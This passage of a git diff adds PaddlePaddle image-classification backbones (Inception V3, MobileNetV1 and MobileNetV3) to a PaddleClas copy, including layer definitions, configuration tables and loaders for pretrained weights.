InceptionA(TheseusLayer): + def __init__(self, num_channels, pool_features): + super().__init__() + self.branch1x1 = ConvBNLayer( + num_channels=num_channels, + num_filters=64, + filter_size=1, + act="relu") + self.branch5x5_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=48, + filter_size=1, + act="relu") + self.branch5x5_2 
= ConvBNLayer( + num_channels=48, + num_filters=64, + filter_size=5, + padding=2, + act="relu") + + self.branch3x3dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=64, + filter_size=1, + act="relu") + self.branch3x3dbl_2 = ConvBNLayer( + num_channels=64, + num_filters=96, + filter_size=3, + padding=1, + act="relu") + self.branch3x3dbl_3 = ConvBNLayer( + num_channels=96, + num_filters=96, + filter_size=3, + padding=1, + act="relu") + self.branch_pool = AvgPool2D( + kernel_size=3, stride=1, padding=1, exclusive=False) + self.branch_pool_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=pool_features, + filter_size=1, + act="relu") + + def forward(self, x): + branch1x1 = self.branch1x1(x) + branch5x5 = self.branch5x5_1(x) + branch5x5 = self.branch5x5_2(branch5x5) + + branch3x3dbl = self.branch3x3dbl_1(x) + branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl) + branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl) + + branch_pool = self.branch_pool(x) + branch_pool = self.branch_pool_conv(branch_pool) + x = paddle.concat( + [branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1) + return x + + +class InceptionB(TheseusLayer): + def __init__(self, num_channels): + super().__init__() + self.branch3x3 = ConvBNLayer( + num_channels=num_channels, + num_filters=384, + filter_size=3, + stride=2, + act="relu") + self.branch3x3dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=64, + filter_size=1, + act="relu") + self.branch3x3dbl_2 = ConvBNLayer( + num_channels=64, + num_filters=96, + filter_size=3, + padding=1, + act="relu") + self.branch3x3dbl_3 = ConvBNLayer( + num_channels=96, + num_filters=96, + filter_size=3, + stride=2, + act="relu") + self.branch_pool = MaxPool2D(kernel_size=3, stride=2) + + def forward(self, x): + branch3x3 = self.branch3x3(x) + + branch3x3dbl = self.branch3x3dbl_1(x) + branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl) + branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl) + + branch_pool = self.branch_pool(x) + + x = 
paddle.concat([branch3x3, branch3x3dbl, branch_pool], axis=1) + + return x + + +class InceptionC(TheseusLayer): + def __init__(self, num_channels, channels_7x7): + super().__init__() + self.branch1x1 = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + + self.branch7x7_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=channels_7x7, + filter_size=1, + stride=1, + act="relu") + self.branch7x7_2 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(1, 7), + stride=1, + padding=(0, 3), + act="relu") + self.branch7x7_3 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=192, + filter_size=(7, 1), + stride=1, + padding=(3, 0), + act="relu") + + self.branch7x7dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=channels_7x7, + filter_size=1, + act="relu") + self.branch7x7dbl_2 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(7, 1), + padding=(3, 0), + act="relu") + self.branch7x7dbl_3 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(1, 7), + padding=(0, 3), + act="relu") + self.branch7x7dbl_4 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(7, 1), + padding=(3, 0), + act="relu") + self.branch7x7dbl_5 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=192, + filter_size=(1, 7), + padding=(0, 3), + act="relu") + + self.branch_pool = AvgPool2D( + kernel_size=3, stride=1, padding=1, exclusive=False) + self.branch_pool_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + + def forward(self, x): + branch1x1 = self.branch1x1(x) + + branch7x7 = self.branch7x7_1(x) + branch7x7 = self.branch7x7_2(branch7x7) + branch7x7 = self.branch7x7_3(branch7x7) + + branch7x7dbl = self.branch7x7dbl_1(x) + branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl) + branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl) + branch7x7dbl = 
self.branch7x7dbl_4(branch7x7dbl) + branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl) + + branch_pool = self.branch_pool(x) + branch_pool = self.branch_pool_conv(branch_pool) + + x = paddle.concat( + [branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1) + + return x + + +class InceptionD(TheseusLayer): + def __init__(self, num_channels): + super().__init__() + self.branch3x3_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + self.branch3x3_2 = ConvBNLayer( + num_channels=192, + num_filters=320, + filter_size=3, + stride=2, + act="relu") + self.branch7x7x3_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + self.branch7x7x3_2 = ConvBNLayer( + num_channels=192, + num_filters=192, + filter_size=(1, 7), + padding=(0, 3), + act="relu") + self.branch7x7x3_3 = ConvBNLayer( + num_channels=192, + num_filters=192, + filter_size=(7, 1), + padding=(3, 0), + act="relu") + self.branch7x7x3_4 = ConvBNLayer( + num_channels=192, + num_filters=192, + filter_size=3, + stride=2, + act="relu") + self.branch_pool = MaxPool2D(kernel_size=3, stride=2) + + def forward(self, x): + branch3x3 = self.branch3x3_1(x) + branch3x3 = self.branch3x3_2(branch3x3) + + branch7x7x3 = self.branch7x7x3_1(x) + branch7x7x3 = self.branch7x7x3_2(branch7x7x3) + branch7x7x3 = self.branch7x7x3_3(branch7x7x3) + branch7x7x3 = self.branch7x7x3_4(branch7x7x3) + + branch_pool = self.branch_pool(x) + + x = paddle.concat([branch3x3, branch7x7x3, branch_pool], axis=1) + return x + + +class InceptionE(TheseusLayer): + def __init__(self, num_channels): + super().__init__() + self.branch1x1 = ConvBNLayer( + num_channels=num_channels, + num_filters=320, + filter_size=1, + act="relu") + self.branch3x3_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=384, + filter_size=1, + act="relu") + self.branch3x3_2a = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(1, 3), + padding=(0, 1), + act="relu") + 
self.branch3x3_2b = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(3, 1), + padding=(1, 0), + act="relu") + + self.branch3x3dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=448, + filter_size=1, + act="relu") + self.branch3x3dbl_2 = ConvBNLayer( + num_channels=448, + num_filters=384, + filter_size=3, + padding=1, + act="relu") + self.branch3x3dbl_3a = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(1, 3), + padding=(0, 1), + act="relu") + self.branch3x3dbl_3b = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(3, 1), + padding=(1, 0), + act="relu") + self.branch_pool = AvgPool2D( + kernel_size=3, stride=1, padding=1, exclusive=False) + self.branch_pool_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + + def forward(self, x): + branch1x1 = self.branch1x1(x) + + branch3x3 = self.branch3x3_1(x) + branch3x3 = [ + self.branch3x3_2a(branch3x3), + self.branch3x3_2b(branch3x3), + ] + branch3x3 = paddle.concat(branch3x3, axis=1) + + branch3x3dbl = self.branch3x3dbl_1(x) + branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl) + branch3x3dbl = [ + self.branch3x3dbl_3a(branch3x3dbl), + self.branch3x3dbl_3b(branch3x3dbl), + ] + branch3x3dbl = paddle.concat(branch3x3dbl, axis=1) + + branch_pool = self.branch_pool(x) + branch_pool = self.branch_pool_conv(branch_pool) + + x = paddle.concat( + [branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1) + return x + + +class Inception_V3(TheseusLayer): + """ + Inception_V3 + Args: + config: dict. config of Inception_V3. + class_num: int=1000. The number of classes. + pretrained: (True or False) or path of pretrained_model. Whether to load the pretrained model. + Returns: + model: nn.Layer. Specific Inception_V3 model depends on args. 
+ """ + + def __init__(self, config, class_num=1000, return_patterns=None): + super().__init__() + + self.inception_a_list = config["inception_a"] + self.inception_c_list = config["inception_c"] + self.inception_b_list = config["inception_b"] + self.inception_d_list = config["inception_d"] + self.inception_e_list = config["inception_e"] + + self.inception_stem = InceptionStem() + + self.inception_block_list = nn.LayerList() + for i in range(len(self.inception_a_list[0])): + inception_a = InceptionA(self.inception_a_list[0][i], + self.inception_a_list[1][i]) + self.inception_block_list.append(inception_a) + + for i in range(len(self.inception_b_list)): + inception_b = InceptionB(self.inception_b_list[i]) + self.inception_block_list.append(inception_b) + + for i in range(len(self.inception_c_list[0])): + inception_c = InceptionC(self.inception_c_list[0][i], + self.inception_c_list[1][i]) + self.inception_block_list.append(inception_c) + + for i in range(len(self.inception_d_list)): + inception_d = InceptionD(self.inception_d_list[i]) + self.inception_block_list.append(inception_d) + + for i in range(len(self.inception_e_list)): + inception_e = InceptionE(self.inception_e_list[i]) + self.inception_block_list.append(inception_e) + + self.avg_pool = AdaptiveAvgPool2D(1) + self.dropout = Dropout(p=0.2, mode="downscale_in_infer") + stdv = 1.0 / math.sqrt(2048 * 1.0) + self.fc = Linear( + 2048, + class_num, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr()) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.inception_stem(x) + for inception_block in self.inception_block_list: + x = inception_block(x) + x = self.avg_pool(x) + x = paddle.reshape(x, shape=[-1, 2048]) + x = self.dropout(x) + x = self.fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained 
is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def InceptionV3(pretrained=False, use_ssld=False, **kwargs): + """ + InceptionV3 + Args: + pretrained: bool=false or str. if `true` load pretrained parameters, `false` otherwise. + if str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `InceptionV3` model + """ + model = Inception_V3(NET_CONFIG, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["InceptionV3"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v1.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v1.py new file mode 100644 index 0000000..944bdb1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v1.py @@ -0,0 +1,234 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import, division, print_function + +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, ReLU, Flatten +from paddle.nn import AdaptiveAvgPool2D +from paddle.nn.initializer import KaimingNormal + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MobileNetV1_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_x0_25_pretrained.pdparams", + "MobileNetV1_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_x0_5_pretrained.pdparams", + "MobileNetV1_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_x0_75_pretrained.pdparams", + "MobileNetV1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + filter_size, + num_filters, + stride, + padding, + num_groups=1): + super().__init__() + + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=num_groups, + weight_attr=ParamAttr(initializer=KaimingNormal()), + bias_attr=False) + self.bn = BatchNorm(num_filters) + self.relu = ReLU() + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + x = self.relu(x) + return x + + +class DepthwiseSeparable(TheseusLayer): + def __init__(self, num_channels, num_filters1, num_filters2, num_groups, + stride, scale): + super().__init__() + + self.depthwise_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=int(num_filters1 * scale), + filter_size=3, + stride=stride, + padding=1, + num_groups=int(num_groups * scale)) + + self.pointwise_conv = ConvBNLayer( + 
num_channels=int(num_filters1 * scale), + filter_size=1, + num_filters=int(num_filters2 * scale), + stride=1, + padding=0) + + def forward(self, x): + x = self.depthwise_conv(x) + x = self.pointwise_conv(x) + return x + + +class MobileNet(TheseusLayer): + """ + MobileNet + Args: + scale: float=1.0. The coefficient that controls the size of network parameters. + class_num: int=1000. The number of classes. + Returns: + model: nn.Layer. Specific MobileNet model depends on args. + """ + + def __init__(self, scale=1.0, class_num=1000, return_patterns=None): + super().__init__() + self.scale = scale + + self.conv = ConvBNLayer( + num_channels=3, + filter_size=3, + num_filters=int(32 * scale), + stride=2, + padding=1) + + #num_channels, num_filters1, num_filters2, num_groups, stride + self.cfg = [[int(32 * scale), 32, 64, 32, 1], + [int(64 * scale), 64, 128, 64, 2], + [int(128 * scale), 128, 128, 128, 1], + [int(128 * scale), 128, 256, 128, 2], + [int(256 * scale), 256, 256, 256, 1], + [int(256 * scale), 256, 512, 256, 2], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 1024, 512, 2], + [int(1024 * scale), 1024, 1024, 1024, 1]] + + self.blocks = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=params[0], + num_filters1=params[1], + num_filters2=params[2], + num_groups=params[3], + stride=params[4], + scale=scale) for params in self.cfg + ]) + + self.avg_pool = AdaptiveAvgPool2D(1) + self.flatten = Flatten(start_axis=1, stop_axis=-1) + + self.fc = Linear( + int(1024 * scale), + class_num, + weight_attr=ParamAttr(initializer=KaimingNormal())) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.conv(x) + x = self.blocks(x) + x = self.avg_pool(x) + x = self.flatten(x) + x = self.fc(x) + 
return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def MobileNetV1_x0_25(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1_x0_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_25` model depends on args. + """ + model = MobileNet(scale=0.25, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_25"], + use_ssld) + return model + + +def MobileNetV1_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_5` model depends on args. + """ + model = MobileNet(scale=0.5, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_5"], + use_ssld) + return model + + +def MobileNetV1_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1_x0_75 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_75` model depends on args. 
+ """ + model = MobileNet(scale=0.75, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_75"], + use_ssld) + return model + + +def MobileNetV1(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1` model depends on args. + """ + model = MobileNet(scale=1.0, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v3.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v3.py new file mode 100644 index 0000000..438e48a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v3.py @@ -0,0 +1,561 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import, division, print_function + +import paddle +import paddle.nn as nn +from paddle import ParamAttr +from paddle.nn import AdaptiveAvgPool2D, BatchNorm, Conv2D, Dropout, Linear +from paddle.regularizer import L2Decay +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MobileNetV3_small_x0_35": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x0_35_pretrained.pdparams", + "MobileNetV3_small_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x0_5_pretrained.pdparams", + "MobileNetV3_small_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x0_75_pretrained.pdparams", + "MobileNetV3_small_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x1_0_pretrained.pdparams", + "MobileNetV3_small_x1_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x1_25_pretrained.pdparams", + "MobileNetV3_large_x0_35": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x0_35_pretrained.pdparams", + "MobileNetV3_large_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x0_5_pretrained.pdparams", + "MobileNetV3_large_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x0_75_pretrained.pdparams", + "MobileNetV3_large_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x1_0_pretrained.pdparams", + "MobileNetV3_large_x1_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x1_25_pretrained.pdparams", +} + +__all__ = MODEL_URLS.keys() + +# "large", 
"small" is just for MobinetV3_large, MobileNetV3_small respectively. +# The type of "large" or "small" config is a list. Each element(list) represents a depthwise block, which is composed of k, exp, se, act, s. +# k: kernel_size +# exp: middle channel number in depthwise block +# c: output channel number in depthwise block +# se: whether to use SE block +# act: which activation to use +# s: stride in depthwise block +NET_CONFIG = { + "large": [ + # k, exp, c, se, act, s + [3, 16, 16, False, "relu", 1], + [3, 64, 24, False, "relu", 2], + [3, 72, 24, False, "relu", 1], + [5, 72, 40, True, "relu", 2], + [5, 120, 40, True, "relu", 1], + [5, 120, 40, True, "relu", 1], + [3, 240, 80, False, "hardswish", 2], + [3, 200, 80, False, "hardswish", 1], + [3, 184, 80, False, "hardswish", 1], + [3, 184, 80, False, "hardswish", 1], + [3, 480, 112, True, "hardswish", 1], + [3, 672, 112, True, "hardswish", 1], + [5, 672, 160, True, "hardswish", 2], + [5, 960, 160, True, "hardswish", 1], + [5, 960, 160, True, "hardswish", 1], + ], + "small": [ + # k, exp, c, se, act, s + [3, 16, 16, True, "relu", 2], + [3, 72, 24, False, "relu", 2], + [3, 88, 24, False, "relu", 1], + [5, 96, 40, True, "hardswish", 2], + [5, 240, 40, True, "hardswish", 1], + [5, 240, 40, True, "hardswish", 1], + [5, 120, 48, True, "hardswish", 1], + [5, 144, 48, True, "hardswish", 1], + [5, 288, 96, True, "hardswish", 2], + [5, 576, 96, True, "hardswish", 1], + [5, 576, 96, True, "hardswish", 1], + ] +} +# first conv output channel number in MobileNetV3 +STEM_CONV_NUMBER = 16 +# last second conv output channel for "small" +LAST_SECOND_CONV_SMALL = 576 +# last second conv output channel for "large" +LAST_SECOND_CONV_LARGE = 960 +# last conv output channel number for "large" and "small" +LAST_CONV = 1280 + + +def _make_divisible(v, divisor=8, min_value=None): + if min_value is None: + min_value = divisor + new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) + if new_v < 0.9 * v: + new_v += divisor + return 
new_v + + +def _create_act(act): + if act == "hardswish": + return nn.Hardswish() + elif act == "relu": + return nn.ReLU() + elif act is None: + return None + else: + raise RuntimeError( + "The activation function is not supported: {}".format(act)) + + +class MobileNetV3(TheseusLayer): + """ + MobileNetV3 + Args: + config: list. MobileNetV3 depthwise blocks config. + scale: float=1.0. The coefficient that controls the size of network parameters. + class_num: int=1000. The number of classes. + inplanes: int=16. The output channel number of first convolution layer. + class_squeeze: int=960. The output channel number of penultimate convolution layer. + class_expand: int=1280. The output channel number of last convolution layer. + dropout_prob: float=0.2. Probability of setting units to zero. + Returns: + model: nn.Layer. Specific MobileNetV3 model depends on args. + """ + + def __init__(self, + config, + scale=1.0, + class_num=1000, + inplanes=STEM_CONV_NUMBER, + class_squeeze=LAST_SECOND_CONV_LARGE, + class_expand=LAST_CONV, + dropout_prob=0.2, + return_patterns=None): + super().__init__() + + self.cfg = config + self.scale = scale + self.inplanes = inplanes + self.class_squeeze = class_squeeze + self.class_expand = class_expand + self.class_num = class_num + + self.conv = ConvBNLayer( + in_c=3, + out_c=_make_divisible(self.inplanes * self.scale), + filter_size=3, + stride=2, + padding=1, + num_groups=1, + if_act=True, + act="hardswish") + + self.blocks = nn.Sequential(* [ + ResidualUnit( + in_c=_make_divisible(self.inplanes * self.scale if i == 0 else + self.cfg[i - 1][2] * self.scale), + mid_c=_make_divisible(self.scale * exp), + out_c=_make_divisible(self.scale * c), + filter_size=k, + stride=s, + use_se=se, + act=act) for i, (k, exp, c, se, act, s) in enumerate(self.cfg) + ]) + + self.last_second_conv = ConvBNLayer( + in_c=_make_divisible(self.cfg[-1][2] * self.scale), + out_c=_make_divisible(self.scale * self.class_squeeze), + filter_size=1, + stride=1, + 
padding=0, + num_groups=1, + if_act=True, + act="hardswish") + + self.avg_pool = AdaptiveAvgPool2D(1) + + self.last_conv = Conv2D( + in_channels=_make_divisible(self.scale * self.class_squeeze), + out_channels=self.class_expand, + kernel_size=1, + stride=1, + padding=0, + bias_attr=False) + + self.hardswish = nn.Hardswish() + self.dropout = Dropout(p=dropout_prob, mode="downscale_in_infer") + self.flatten = nn.Flatten(start_axis=1, stop_axis=-1) + + self.fc = Linear(self.class_expand, class_num) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.conv(x) + x = self.blocks(x) + x = self.last_second_conv(x) + x = self.avg_pool(x) + x = self.last_conv(x) + x = self.hardswish(x) + x = self.dropout(x) + x = self.flatten(x) + x = self.fc(x) + + return x + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + in_c, + out_c, + filter_size, + stride, + padding, + num_groups=1, + if_act=True, + act=None): + super().__init__() + + self.conv = Conv2D( + in_channels=in_c, + out_channels=out_c, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=num_groups, + bias_attr=False) + self.bn = BatchNorm( + num_channels=out_c, + act=None, + param_attr=ParamAttr(regularizer=L2Decay(0.0)), + bias_attr=ParamAttr(regularizer=L2Decay(0.0))) + self.if_act = if_act + self.act = _create_act(act) + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + if self.if_act: + x = self.act(x) + return x + + +class ResidualUnit(TheseusLayer): + def __init__(self, + in_c, + mid_c, + out_c, + filter_size, + stride, + use_se, + act=None): + super().__init__() + self.if_shortcut = stride == 1 and in_c == out_c + self.if_se = use_se + + self.expand_conv = ConvBNLayer( + in_c=in_c, + out_c=mid_c, + filter_size=1, + stride=1, + padding=0, + if_act=True, + act=act) + self.bottleneck_conv = ConvBNLayer( + in_c=mid_c, + out_c=mid_c, + filter_size=filter_size, + 
stride=stride, + padding=int((filter_size - 1) // 2), + num_groups=mid_c, + if_act=True, + act=act) + if self.if_se: + self.mid_se = SEModule(mid_c) + self.linear_conv = ConvBNLayer( + in_c=mid_c, + out_c=out_c, + filter_size=1, + stride=1, + padding=0, + if_act=False, + act=None) + + def forward(self, x): + identity = x + x = self.expand_conv(x) + x = self.bottleneck_conv(x) + if self.if_se: + x = self.mid_se(x) + x = self.linear_conv(x) + if self.if_shortcut: + x = paddle.add(identity, x) + return x + + +# nn.Hardsigmoid can't transfer "slope" and "offset" in nn.functional.hardsigmoid +class Hardsigmoid(TheseusLayer): + def __init__(self, slope=0.2, offset=0.5): + super().__init__() + self.slope = slope + self.offset = offset + + def forward(self, x): + return nn.functional.hardsigmoid( + x, slope=self.slope, offset=self.offset) + + +class SEModule(TheseusLayer): + def __init__(self, channel, reduction=4): + super().__init__() + self.avg_pool = AdaptiveAvgPool2D(1) + self.conv1 = Conv2D( + in_channels=channel, + out_channels=channel // reduction, + kernel_size=1, + stride=1, + padding=0) + self.relu = nn.ReLU() + self.conv2 = Conv2D( + in_channels=channel // reduction, + out_channels=channel, + kernel_size=1, + stride=1, + padding=0) + self.hardsigmoid = Hardsigmoid(slope=0.2, offset=0.5) + + def forward(self, x): + identity = x + x = self.avg_pool(x) + x = self.conv1(x) + x = self.relu(x) + x = self.conv2(x) + x = self.hardsigmoid(x) + return paddle.multiply(x=identity, y=x) + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def MobileNetV3_small_x0_35(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x0_35 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_35` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=0.35, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x0_35"], + use_ssld) + return model + + +def MobileNetV3_small_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_5` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=0.5, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x0_5"], + use_ssld) + return model + + +def MobileNetV3_small_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x0_75 + Args: + pretrained: bool=false or str. if `true` load pretrained parameters, `false` otherwise. + if str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_75` model depends on args. 
